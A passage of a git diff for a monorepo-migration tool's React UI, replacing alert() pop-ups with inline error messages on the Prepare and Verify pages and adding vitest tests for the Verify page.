  • + {s.id}{s.skipRationale ? ` — ${s.skipRationale}` : ''} +
  • + ))} +
+
+ )} +
+ +

Next Steps

+
+

+ Re-run verification to confirm the monorepo is healthy: +

+ + + or run monorepo verify --dir {options.outputDir} + +
+ +

Add Repository

+
+

+ Need to add another repository to the monorepo? +

+

+ Use monorepo add <repo> --to {options.outputDir} to add + repositories incrementally. A guided wizard for this workflow is coming soon. +

+
+
diff --git a/ui/src/pages/PreparePage.tsx b/ui/src/pages/PreparePage.tsx index c121f06..9413458 100755 --- a/ui/src/pages/PreparePage.tsx +++ b/ui/src/pages/PreparePage.tsx @@ -25,16 +25,18 @@ interface PrepareResult { export function PreparePage({ ws, repos, targetNodeVersion, onTargetNodeVersionChange, onComplete, onSkip }: PreparePageProps) { const op = useOperation(ws); const [loading, setLoading] = useState(false); + const [error, setError] = useState(null); const handlePrepare = async () => { if (repos.length === 0) return; + setError(null); setLoading(true); try { const options = targetNodeVersion ? { targetNodeVersion } : {}; const { opId } = await postPrepare(repos, options); op.start(opId); } catch (err) { - alert(err instanceof Error ? err.message : 'Request failed'); + setError(err instanceof Error ? err.message : 'Request failed'); } finally { setLoading(false); } @@ -72,7 +74,8 @@ export function PreparePage({ ws, repos, targetNodeVersion, onTargetNodeVersionC - {op.error &&
{op.error}
} + {error &&
{error}
} + {op.error &&
{op.error}
} {result && (
diff --git a/ui/src/pages/VerifyPage.test.tsx b/ui/src/pages/VerifyPage.test.tsx new file mode 100644 index 0000000..97009a6 --- /dev/null +++ b/ui/src/pages/VerifyPage.test.tsx @@ -0,0 +1,136 @@ +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react'; +import { beforeEach, describe, expect, it, vi } from 'vitest'; +import type { UseWebSocketReturn, WsEvent } from '../hooks/useWebSocket'; +import { VerifyPage } from './VerifyPage'; +import * as api from '../api/client'; + +vi.mock('../api/client', () => ({ + postVerify: vi.fn(), +})); + +type MockWebSocket = UseWebSocketReturn & { + subscribe: ReturnType; + cancel: ReturnType; + emit: (event: WsEvent) => void; +}; + +function createMockWebSocket(): MockWebSocket { + const handlers = new Set<(event: WsEvent) => void>(); + const subscribe = vi.fn(); + const cancel = vi.fn(); + + return { + connected: true, + reconnecting: false, + connectionFailed: false, + retryCount: 0, + maxRetries: 10, + subscribe, + cancel, + onEvent: (handler) => { + handlers.add(handler); + return () => { + handlers.delete(handler); + }; + }, + emit: (event) => { + for (const handler of handlers) { + handler(event); + } + }, + }; +} + +describe('VerifyPage', () => { + beforeEach(() => { + vi.clearAllMocks(); + }); + + it('runs plan-mode verification and renders results', async () => { + const ws = createMockWebSocket(); + vi.mocked(api.postVerify).mockResolvedValue({ opId: 'verify-op' }); + const onComplete = vi.fn(); + + render( + , + ); + + fireEvent.click(screen.getByRole('button', { name: 'Verify' })); + + await waitFor(() => { + expect(api.postVerify).toHaveBeenCalledWith({ plan: '/tmp/mono.plan.json', tier: 'static' }); + expect(ws.subscribe).toHaveBeenCalledWith('verify-op'); + }); + + act(() => { + ws.emit({ + type: 'result', + opId: 'verify-op', + data: { + tier: 'static', + checks: [{ id: 'c1', message: 'Root package.json has private: true', status: 'pass', tier: 'static' }], + summary: { total: 1, pass: 1, 
warn: 0, fail: 0 }, + ok: true, + }, + }); + ws.emit({ type: 'done', opId: 'verify-op' }); + }); + + await waitFor(() => { + expect(screen.getByText('Verification passed')).toBeInTheDocument(); + expect(screen.getByText('Root package.json has private: true')).toBeInTheDocument(); + }); + + fireEvent.click(screen.getByRole('button', { name: 'Mark Complete & Continue' })); + expect(onComplete).toHaveBeenCalledTimes(1); + }); + + it('supports directory mode payloads', async () => { + const ws = createMockWebSocket(); + vi.mocked(api.postVerify).mockResolvedValue({ opId: 'verify-op' }); + + render( + , + ); + + fireEvent.click(screen.getByRole('radio', { name: 'Directory' })); + fireEvent.change(screen.getByRole('combobox'), { target: { value: 'full' } }); + fireEvent.click(screen.getByRole('button', { name: 'Verify' })); + + await waitFor(() => { + expect(api.postVerify).toHaveBeenCalledWith({ dir: '/tmp/mono', tier: 'full' }); + expect(ws.subscribe).toHaveBeenCalledWith('verify-op'); + }); + }); + + it('renders verify request errors inline', async () => { + const ws = createMockWebSocket(); + vi.mocked(api.postVerify).mockRejectedValue(new Error('Verify failed')); + + render( + , + ); + + fireEvent.click(screen.getByRole('button', { name: 'Verify' })); + + await waitFor(() => { + expect(screen.getByRole('alert')).toHaveTextContent('Verify failed'); + }); + }); +}); diff --git a/ui/src/pages/VerifyPage.tsx b/ui/src/pages/VerifyPage.tsx index 67eaa48..5de4d9d 100755 --- a/ui/src/pages/VerifyPage.tsx +++ b/ui/src/pages/VerifyPage.tsx @@ -27,6 +27,7 @@ export function VerifyPage({ ws, planPath: initialPlanPath, outputDir, onComplet const [planPath, setPlanPath] = useState(initialPlanPath || ''); const [dirPath, setDirPath] = useState(outputDir || ''); const [tier, setTier] = useState('static'); + const [error, setError] = useState(null); const op = useOperation(ws); const [loading, setLoading] = useState(false); @@ -34,13 +35,14 @@ export function VerifyPage({ ws, 
planPath: initialPlanPath, outputDir, onComplet const handleVerify = async () => { if (!inputValue) return; + setError(null); setLoading(true); try { const body = inputMode === 'plan' ? { plan: planPath, tier } : { dir: dirPath, tier }; const { opId } = await postVerify(body); op.start(opId); } catch (err) { - alert(err instanceof Error ? err.message : 'Request failed'); + setError(err instanceof Error ? err.message : 'Request failed'); } finally { setLoading(false); } @@ -101,7 +103,8 @@ export function VerifyPage({ ws, planPath: initialPlanPath, outputDir, onComplet - {op.error &&
{op.error}
} + {error &&
{error}
} + {op.error &&
{op.error}
} {result && (
diff --git a/ui/src/pages/WizardSetup.tsx b/ui/src/pages/WizardSetup.tsx index 01f4762..f3e8279 100755 --- a/ui/src/pages/WizardSetup.tsx +++ b/ui/src/pages/WizardSetup.tsx @@ -42,7 +42,7 @@ export function WizardSetup({ onInit }: WizardSetupProps) { />
- {error &&
{error}
} + {error &&
{error}
}